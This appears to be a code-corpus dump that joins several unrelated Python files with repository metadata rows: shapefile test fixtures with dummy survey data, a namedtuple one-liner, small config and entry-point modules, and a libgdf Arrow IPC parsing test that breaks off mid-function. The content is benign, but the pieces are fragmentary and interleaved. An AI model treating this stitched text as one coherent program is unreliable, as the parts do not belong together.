b'\x00\x00>\xc0\x00\x00\x00\x00\x00\x80Q@\x00\x00\x00\x00\x00\x00>@'
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
b'\x00\x00\x002\x00\x00\x008\x00\x00\x00n\x00\x00\x008'}
@property
def result_geom_shp_point(self):
return [b"\x00\x00'\n\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
b'\x00\x00\x00\x00\x00\x00\x00N\xe8\x03\x00\x00\x01\x00\x00\x00'
b'\x00\x00\x00\x00\x00\x80F\xc0\x00\x00\x00\x00\x00\x80F\xc0\x00\x00\x00\x00'
b'\x00\x80F@\x00\x00\x00\x00\x00\x80F@\x00\x00\x00\x00\x00\x00\x00\x00'
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\n'
b'\x01\x00\x00\x00\x00\x00\x00\x00\x00\x80F@\x00\x00\x00\x00\x00\x80F@'
b'\x00\x00\x00\x02\x00\x00\x00\n\x01\x00\x00\x00\x00\x00\x00\x00\x00\x80F\xc0'
b'\x00\x00\x00\x00\x00\x80F\xc0',
b"\x00\x00'\n\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
b'\x00\x00\x00\x00\x00\x00\x00:\xe8\x03\x00\x00\x01\x00\x00\x00'
b'\x00\x00\x00\x00\x00\x80F\xc0\x00\x00\x00\x00\x00\x80F\xc0\x00\x00\x00\x00'
b'\x00\x80F@\x00\x00\x00\x00\x00\x80F@\x00\x00\x00\x00\x00\x00\x00\x00'
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x002\x00\x00\x00\n\x00\x00\x00@'
b'\x00\x00\x00\n',
b'\x03y\x0b\x16\x02\x00\x00\x00a\x01\xf5\x01\x00\x00\x00\x00\x00\x00\x00\x00'
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00ID\x00\x00\x00\x00\x00\x00'
b'\x00\x00\x00C\x00\x00\x00\x002\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
b'\x00\x00\x00\x00USER_NAME\x00\x00C\x00\x00\x00\x002\x00\x00\x00'
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00SURVEY\x00\x00\x00\x00\x00C'
b'\x00\x00\x00\x002\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
b'\x00\x00\x00\x00TIME\x00\x00\x00\x00\x00\x00\x00C\x00\x00\x00\x00'
b'2\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00PHOT'
b'O\x00\x00\x00\x00\x00\x00C\x00\x00\x00\x002\x00\x00\x00\x00\x00\x00\x00'
b'\x00\x00\x00\x00\x00\x00\x00\x00VIDEO\x00\x00\x00\x00\x00\x00C'
b'\x00\x00\x00\x002\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
b'\x00\x00\x00\x00QUEST_1\x00\x00\x00\x00C\x00\x00\x00\x002\x00\x00\x00'
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00ANS_1\x00\x00\x00'
b'\x00\x00\x00C\x00\x00\x00\x002\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
b'\x00\x00\x00\x00QUEST_2\x00\x00\x00\x00C\x00\x00\x00\x002\x00\x00\x00'
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00ANS_2\x00\x00\x00'
b'\x00\x00\x00C\x00\x00\x00\x002\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
b'\x00\x00\x00\x00\r 37 Name'
b'53 survey53 '
b' 20-Nov-2021 22:45:00 https:'
b'//telegra.ph/test_path_photo53 https://telegra.ph/test_path_vid'
b'eo53 question53_1 answer53'
b'_1 question53_2 '
b' answer53_2 38 '
b' Name53 '
b' survey53 20-Nov-2021'
b' 22:45:00 '
b' question53_1 '
b' answer53_1 '
b' question53_2 answer53_2 '
b' ',
b'GEOGCS["GCS_WGS_1984",DATUM["D_WGS_1984",SPHEROID["WGS_1984",6378137,298.257'
b'223563]],PRIMEM["Greenwich",0],UNIT["Degree",0.017453292519943295]]']
@property
def result_geom_shp_polygon(self):
return [b"\x00\x00'\n\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
b'\x00\x00\x00\x00\x00\x00\x00\xaa\xe8\x03\x00\x00\x05\x00\x00\x00'
b'\x00\x00\x00\x00\x00\x00D\xc0\x00\x00\x00\x00\x00\x00>\xc0\x00\x00\x00\x00'
b'\x00\x80Q@\x00\x00\x00\x00\x00\x00>@\x00\x00\x00\x00\x00\x00\x00\x00'
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x008'
b'\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00>\xc0\x00\x00\x00\x00\x00\x00>\xc0'
b'\x00\x00\x00\x00\x00\x00>@\x00\x00\x00\x00\x00\x00>@\x01\x00\x00\x00'
b'\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00>@\x00\x00\x00\x00'
b'\x00\x00>@\x00\x00\x00\x00\x00\x00>\xc0\x00\x00\x00\x00\x00\x00>\xc0'
b'\x00\x00\x00\x00\x00\x00$@\x00\x00\x00\x00\x00\x004@\x00\x00\x00\x00'
b'\x00\x00>@\x00\x00\x00\x00\x00\x00>@\x00\x00\x00\x02\x00\x00\x008'
b'\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00D\xc0\x00\x00\x00\x00\x00\x00$\xc0'
b'\x00\x00\x00\x00\x00\x80Q@\x00\x00\x00\x00\x00\x004@\x01\x00\x00\x00'
b'\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00D@\x00\x00\x00\x00'
b'\x00\x00$@\x00\x00\x00\x00\x00\x00D\xc0\x00\x00\x00\x00\x00\x00$\xc0'
b'\x00\x00\x00\x00\x00\x80Q@\x00\x00\x00\x00\x00\x004@\x00\x00\x00\x00'
b'\x00\x00D@\x00\x00\x00\x00\x00\x00$@',
b"\x00\x00'\n\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
b'\x00\x00\x00\x00\x00\x00\x00:\xe8\x03\x00\x00\x05\x00\x00\x00'
b'\x00\x00\x00\x00\x00\x00D\xc0\x00\x00\x00\x00\x00\x00>\xc0\x00\x00\x00\x00'
b'\x00\x80Q@\x00\x00\x00\x00\x00\x00>@\x00\x00\x00\x00\x00\x00\x00\x00'
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x002\x00\x00\x008\x00\x00\x00n'
b'\x00\x00\x008',
b'\x03y\x0b\x16\x02\x00\x00\x00a\x01\xf5\x01\x00\x00\x00\x00\x00\x00\x00\x00'
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00ID\x00\x00\x00\x00\x00\x00'
b'\x00\x00\x00C\x00\x00\x00\x002\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
b'\x00\x00\x00\x00USER_NAME\x00\x00C\x00\x00\x00\x002\x00\x00\x00'
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00SURVEY\x00\x00\x00\x00\x00C'
b'\x00\x00\x00\x002\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
b'\x00\x00\x00\x00TIME\x00\x00\x00\x00\x00\x00\x00C\x00\x00\x00\x00'
b'2\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00PHOT'
b'O\x00\x00\x00\x00\x00\x00C\x00\x00\x00\x002\x00\x00\x00\x00\x00\x00\x00'
b'\x00\x00\x00\x00\x00\x00\x00\x00VIDEO\x00\x00\x00\x00\x00\x00C'
b'\x00\x00\x00\x002\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
b'\x00\x00\x00\x00QUEST_1\x00\x00\x00\x00C\x00\x00\x00\x002\x00\x00\x00'
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00ANS_1\x00\x00\x00'
b'\x00\x00\x00C\x00\x00\x00\x002\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
b'\x00\x00\x00\x00QUEST_2\x00\x00\x00\x00C\x00\x00\x00\x002\x00\x00\x00'
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00ANS_2\x00\x00\x00'
b'\x00\x00\x00C\x00\x00\x00\x002\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
b'\x00\x00\x00\x00\r 39 Name'
b'54 survey53 '
b' 20-Nov-2021 22:45:00 https:'
b'//telegra.ph/test_path_photo54 https://telegra.ph/test_path_vid'
b'eo54 question53_1 answer54'
b'_1 question53_2 '
b' answer54_2 40 '
b' Name55 '
b' survey53 20-Nov-2021'
b' 22:45:00 https://telegra.ph/test_path_photo55 '
b' https://telegra.ph/test_path_video55 question53_1 '
b' answer55_1 '
b' question53_2 answer55_2 '
b' ',
b'GEOGCS["GCS_WGS_1984",DATUM["D_WGS_1984",SPHEROID["WGS_1984",6378137,298.257'
b'223563]],PRIMEM["Greenwich",0],UNIT["Degree",0.017453292519943295]]']
| 69.396552
| 120
| 0.390725
| 8,114
| 72,450
| 3.412127
| 0.066428
| 0.550459
| 0.66055
| 0.691324
| 0.837427
| 0.808387
| 0.790797
| 0.777252
| 0.764899
| 0.732536
| 0
| 0.248996
| 0.456977
| 72,450
| 1,044
| 121
| 69.396552
| 0.45473
| 0.001629
| 0
| 0.631743
| 0
| 0.275934
| 0.507737
| 0.234848
| 0
| 0
| 0
| 0
| 0
| 1
| 0.074689
| false
| 0.001037
| 0.002075
| 0.073651
| 0.155602
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 12
|
424b3207336300f0a34bbc72098c2f8c131bd3c7
| 205
|
py
|
Python
|
CA117/Lab_5/stutuple_32.py
|
PRITI1999/OneLineWonders
|
91a7368e0796e5a3b5839c9165f9fbe5460879f5
|
[
"MIT"
] | 6
|
2016-02-04T00:15:20.000Z
|
2019-10-13T13:53:16.000Z
|
CA117/Lab_5/stutuple_32.py
|
PRITI1999/OneLineWonders
|
91a7368e0796e5a3b5839c9165f9fbe5460879f5
|
[
"MIT"
] | 2
|
2016-03-14T04:01:36.000Z
|
2019-10-16T12:45:34.000Z
|
CA117/Lab_5/stutuple_32.py
|
PRITI1999/OneLineWonders
|
91a7368e0796e5a3b5839c9165f9fbe5460879f5
|
[
"MIT"
] | 10
|
2016-02-09T14:38:32.000Z
|
2021-05-25T08:16:26.000Z
|
Student,show_student=__import__("collections").namedtuple("Student",["firstname","surname","id"]),lambda s:print("First name: {}\n{:>10}: {}\n{:>10}: {}".format(s.firstname,"Surname",s.surname,"ID",s.id))
| 102.5
| 204
| 0.673171
| 28
| 205
| 4.75
| 0.571429
| 0.240602
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.020101
| 0.029268
| 205
| 1
| 205
| 205
| 0.648241
| 0
| 0
| 0
| 0
| 0
| 0.404878
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 1
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 1
|
0
| 8
|
429e0891ed2ca21fa2f18be7b6863cd0f9d3ad96
| 52
|
py
|
Python
|
notebooks/custom_functions.py
|
Telefonica/clipspy
|
87d1d63604a209e2271efd3d3b8df0943836a504
|
[
"BSD-3-Clause"
] | null | null | null |
notebooks/custom_functions.py
|
Telefonica/clipspy
|
87d1d63604a209e2271efd3d3b8df0943836a504
|
[
"BSD-3-Clause"
] | null | null | null |
notebooks/custom_functions.py
|
Telefonica/clipspy
|
87d1d63604a209e2271efd3d3b8df0943836a504
|
[
"BSD-3-Clause"
] | null | null | null |
import time
def get_time():
return time.time()
| 10.4
| 22
| 0.673077
| 8
| 52
| 4.25
| 0.625
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.211538
| 52
| 4
| 23
| 13
| 0.829268
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
671418db26c09cf2289f4f64ba1a7ee2437086c9
| 333
|
py
|
Python
|
paperboy/config/__init__.py
|
chris-aeviator/paperboy
|
604c912c3530cd37fb07dcf22321d9dde15465ee
|
[
"Apache-2.0"
] | 233
|
2018-11-01T09:17:08.000Z
|
2022-03-22T08:27:24.000Z
|
paperboy/config/__init__.py
|
chris-aeviator/paperboy
|
604c912c3530cd37fb07dcf22321d9dde15465ee
|
[
"Apache-2.0"
] | 99
|
2018-10-17T21:48:42.000Z
|
2021-05-07T08:33:36.000Z
|
paperboy/config/__init__.py
|
chris-aeviator/paperboy
|
604c912c3530cd37fb07dcf22321d9dde15465ee
|
[
"Apache-2.0"
] | 29
|
2018-11-01T11:33:08.000Z
|
2022-01-12T22:12:19.000Z
|
from .base import * # noqa: F401, F403
from .forms import * # noqa: F401, F403
from .job import * # noqa: F401, F403
from .notebook import * # noqa: F401, F403
from .output import * # noqa: F401, F403
from .report import * # noqa: F401, F403
from .scheduler import * # noqa: F401, F403
from .user import * # noqa: F401, F403
| 37
| 44
| 0.663664
| 48
| 333
| 4.604167
| 0.270833
| 0.361991
| 0.506787
| 0.651584
| 0.696833
| 0
| 0
| 0
| 0
| 0
| 0
| 0.183908
| 0.216216
| 333
| 8
| 45
| 41.625
| 0.662835
| 0.405405
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
6720e3dd5cd16619e6566f3c83ba08ef7e9082bb
| 68
|
py
|
Python
|
src/kfs/__main__.py
|
mattkram/kfs
|
a0dde700e05dc44acc9b523e4092e51065f57856
|
[
"MIT"
] | null | null | null |
src/kfs/__main__.py
|
mattkram/kfs
|
a0dde700e05dc44acc9b523e4092e51065f57856
|
[
"MIT"
] | 2
|
2022-01-24T04:17:38.000Z
|
2022-01-31T17:07:34.000Z
|
src/kfs/__main__.py
|
mattkram/kfs
|
a0dde700e05dc44acc9b523e4092e51065f57856
|
[
"MIT"
] | null | null | null |
from .cli import app # pragma: no cover
app() # pragma: no cover
| 17
| 40
| 0.661765
| 11
| 68
| 4.090909
| 0.636364
| 0.4
| 0.488889
| 0.711111
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.235294
| 68
| 3
| 41
| 22.666667
| 0.865385
| 0.485294
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
6720f9681d1f6035ee739a684252fd2b77079018
| 10,532
|
py
|
Python
|
python/tests/test_ipc.py
|
aschaffer/libgdf
|
dd9bc77a61098215b37f63cc8a09c3dc69cf1cb3
|
[
"Apache-2.0"
] | 1
|
2020-07-13T04:17:08.000Z
|
2020-07-13T04:17:08.000Z
|
python/tests/test_ipc.py
|
aschaffer/libgdf
|
dd9bc77a61098215b37f63cc8a09c3dc69cf1cb3
|
[
"Apache-2.0"
] | null | null | null |
python/tests/test_ipc.py
|
aschaffer/libgdf
|
dd9bc77a61098215b37f63cc8a09c3dc69cf1cb3
|
[
"Apache-2.0"
] | null | null | null |
import json
from pprint import pprint
import numpy as np
from numba import cuda
from libgdf_cffi import ffi, libgdf
expected_values = """
0,orange,0.4713545411053003
1,orange,0.003790919207527499
2,orange,0.4396940888188392
3,apple,0.5693619092183622
4,pear,0.10894215574048405
5,pear,0.09547296520000881
6,orange,0.4123169425191555
7,apple,0.4125838710498503
8,orange,0.1904218750870219
9,apple,0.9289366739893021
10,orange,0.9330387015860205
11,pear,0.46564799732291595
12,apple,0.8573176464520044
13,pear,0.21566885180419648
14,orange,0.9199361970381871
15,orange,0.9819955872277085
16,apple,0.415964752238025
17,grape,0.36941794781567516
18,apple,0.9761832273396152
19,grape,0.16672327312068824
20,orange,0.13311815129622395
21,orange,0.6230693626648358
22,pear,0.7321171864853122
23,grape,0.23106658283660853
24,pear,0.0198404248930919
25,orange,0.4032931749027482
26,grape,0.665861129515741
27,pear,0.10253071509254097
28,orange,0.15243296681892238
29,pear,0.3514868485827787
"""
def get_expected_values():
lines = filter(lambda x: x.strip(), expected_values.splitlines())
rows = [ln.split(',') for ln in lines]
return [(int(idx), name, float(weight))
for idx, name, weight in rows]
def test_ipc():
schema_bytes = b'\xa8\x01\x00\x00\x10\x00\x00\x00\x0c\x00\x0e\x00\x06\x00\x05\x00\x08\x00\x00\x00\x0c\x00\x00\x00\x00\x01\x02\x00\x10\x00\x00\x00\x00\x00\n\x00\x08\x00\x00\x00\x04\x00\x00\x00\n\x00\x00\x00\x04\x00\x00\x00\x03\x00\x00\x00\x18\x01\x00\x00p\x00\x00\x00\x04\x00\x00\x00\x08\xff\xff\xff\x00\x00\x01\x03@\x00\x00\x00$\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x02\x00\x00\x00$\x00\x00\x00\x18\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x06\x00\x06\x00\x00\x00\x00\x00\x02\x00\xe8\xfe\xff\xff@\x00\x01\x00\xf0\xfe\xff\xff\x01\x00\x02\x00\x06\x00\x00\x00weight\x00\x00\x14\x00\x1e\x00\x08\x00\x06\x00\x07\x00\x0c\x00\x10\x00\x14\x00\x18\x00\x00\x00\x14\x00\x00\x00\x00\x00\x01\x05|\x00\x00\x00T\x00\x00\x00\x18\x00\x00\x00D\x00\x00\x000\x00\x00\x00\x00\x00\n\x00\x14\x00\x08\x00\x04\x00\x00\x00\n\x00\x00\x00\x10\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00p\xff\xff\xff\x00\x00\x00\x01 \x00\x00\x00\x03\x00\x00\x000\x00\x00\x00$\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x04\x00\x04\x00\x04\x00\x00\x00|\xff\xff\xff\x08\x00\x01\x00\x08\x00\x08\x00\x06\x00\x00\x00\x08\x00\x00\x00\x00\x00 \x00\x94\xff\xff\xff\x01\x00\x02\x00\x04\x00\x00\x00name\x00\x00\x00\x00\x14\x00\x18\x00\x08\x00\x06\x00\x07\x00\x0c\x00\x00\x00\x10\x00\x14\x00\x00\x00\x14\x00\x00\x00\x00\x00\x01\x02L\x00\x00\x00$\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x02\x00\x00\x000\x00\x00\x00\x1c\x00\x00\x00\x00\x00\x00\x00\x08\x00\x0c\x00\x08\x00\x07\x00\x08\x00\x00\x00\x00\x00\x00\x01 \x00\x00\x00\xf8\xff\xff\xff 
\x00\x01\x00\x08\x00\x08\x00\x04\x00\x06\x00\x08\x00\x00\x00\x01\x00\x02\x00\x03\x00\x00\x00idx\x00\xc8\x00\x00\x00\x14\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x14\x00\x06\x00\x05\x00\x08\x00\x0c\x00\x0c\x00\x00\x00\x00\x02\x02\x00\x14\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x08\x00\x12\x00\x08\x00\x04\x00\x08\x00\x00\x00\x18\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\n\x00\x18\x00\x0c\x00\x04\x00\x08\x00\n\x00\x00\x00d\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\xff\xff\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00@\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\x00\x00\x00\x00@\x00\x00\x00\x00\x00\x00\x00@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x0b\x00\x00\x00\x0f\x00\x00\x00\x14\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00orangeapplepeargrape\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
cpu_data = np.ndarray(shape=len(schema_bytes), dtype=np.byte,
buffer=bytearray(schema_bytes))
# Use GDF IPC parser
schema_ptr = ffi.cast("void*", cpu_data.ctypes.data)
ipch = libgdf.gdf_ipc_parser_open(schema_ptr, cpu_data.size)
if libgdf.gdf_ipc_parser_failed(ipch):
print(libgdf.gdf_ipc_parser_get_error(ipch))
jsonraw = libgdf.gdf_ipc_parser_get_schema_json(ipch)
jsontext = ffi.string(jsonraw).decode()
json_schema = json.loads(jsontext)
pprint(json_schema)
recordbatches_bytes = b'\x1c\x01\x00\x00\x14\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x16\x00\x06\x00\x05\x00\x08\x00\x0c\x00\x0c\x00\x00\x00\x00\x03\x02\x00\x18\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\n\x00\x18\x00\x0c\x00\x04\x00\x08\x00\n\x00\x00\x00\xac\x00\x00\x00\x10\x00\x00\x00\x1e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\xff\xff\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\x00\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\x00\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x1e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00\x03\x00\x00\x00\x10\x00\x00\x00\x11\x00\x00\x00\x12\x00\x00\x00\x13\x00\x00\x00\x04\x00\x00\x00\x05\x00\x00\x00\x06\x00\x00\x00\x07\x00\x00\x00\x14\x00\x00\x00\x15\x00\x00\x00\x16\x00\x00\x00\x17\x00\x00\x00\x08\x00\x00\x00\t\x00\x00\x00\n\x00\x00\x00\x0b\x00\x00\x00\x18\x00\x00\x00\x19\x00\x00\x00\x1a\x00\x00\x00\x1b\x00\x00\x00\x0c\x00\x00\x00\r\x00\x00\x00\x0e\x00\x00\x00\x0f\x00\x00\x00\x1c\x00\x00\x00\x1d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x03\x00\x00\x00\x01\x00\x00\x00\x03\x00\x00\x00\x02\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x
02\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x02\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x16\x93\xb7<\xac*\xde?\x00Y\x94@"\x0eo?\xf8+\xee\xac\xf2#\xdc?\xa4\xcauw68\xe2?\xf8\xaa\xc9\x9f*\x9f\xda?\xe0\x1e\x1b-\x8b\xa4\xd7?\xe6y\x8a\x9b\xe4<\xef?\x08\x89\xc4.0W\xc5?h\xa5\x0f\x14\xa2\xe3\xbb?\xc0\xa9/\x8f\xeap\xb8?\x0c7\xed\x99fc\xda?:\tA.\xc6g\xda?\x1c\x1f)\xfd\x03\n\xc1?\xfe\x1e\xf9(/\xf0\xe3?\x08h\x99\x05\x81m\xe7?\xa0\xa8=\xfc\x96\x93\xcd?x\x8b\xf8v\xbe_\xc8?\xa2\xd9Zg\xd9\xb9\xed?;\xdb\xa6\xfas\xdb\xed?\xd8\xc9\xfcA-\xcd\xdd?@\xe27`\x0cQ\x94?d\x11:-\x8e\xcf\xd9?\xc9S\xde\xff\xbbN\xe5?\xe0o(\xf4s?\xba?\x0bq\xb9j%o\xeb?\x10\xe8\xa1t\t\x9b\xcb?\xa5\xf0\x15\t\x1ep\xed?\xc7\xb2~\x02\x82l\xef?0\xe6\xa8g\xec\x82\xc3?\xe0\xc6\xe8\xb1\xc2~\xd6?\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
rb_cpu_data = np.ndarray(shape=len(recordbatches_bytes), dtype=np.byte,
buffer=bytearray(recordbatches_bytes))
rb_gpu_data = cuda.to_device(rb_cpu_data)
del cpu_data
devptr = ffi.cast("void*", rb_gpu_data.device_ctypes_pointer.value)
libgdf.gdf_ipc_parser_open_recordbatches(ipch, devptr, rb_gpu_data.size)
if libgdf.gdf_ipc_parser_failed(ipch):
print(libgdf.gdf_ipc_parser_get_error(ipch))
jsonraw = libgdf.gdf_ipc_parser_get_layout_json(ipch)
jsontext = ffi.string(jsonraw).decode()
json_rb = json.loads(jsontext)
pprint(json_rb)
offset = libgdf.gdf_ipc_parser_get_data_offset(ipch)
libgdf.gdf_ipc_parser_close(ipch)
# Check
dicts = json_schema['dictionaries']
assert len(dicts) == 1
dictdata = dicts[0]['data']['columns'][0]['DATA']
assert set(dictdata) == {'orange', 'apple', 'pear', 'grape'}
gpu_data = rb_gpu_data[offset:]
schema_fields = json_schema['schema']['fields']
assert len(schema_fields) == 3
field_names = [f['name'] for f in schema_fields]
assert field_names == ['idx', 'name', 'weight']
# check the dictionary id in schema
assert schema_fields[1]['dictionary']['id'] == dicts[0]['id']
# Get "idx" column
idx_buf_off = json_rb[0]['data_buffer']['offset']
idx_buf_len = json_rb[0]['data_buffer']['length']
idx_buf = gpu_data[idx_buf_off:][:idx_buf_len]
assert json_rb[0]['dtype']['name'] == 'INT32'
idx_size = json_rb[0]['length']
assert idx_size == 30
idx_data = np.ndarray(shape=idx_size, dtype=np.int32,
buffer=idx_buf.copy_to_host())
print(idx_data)
# Get "name" column
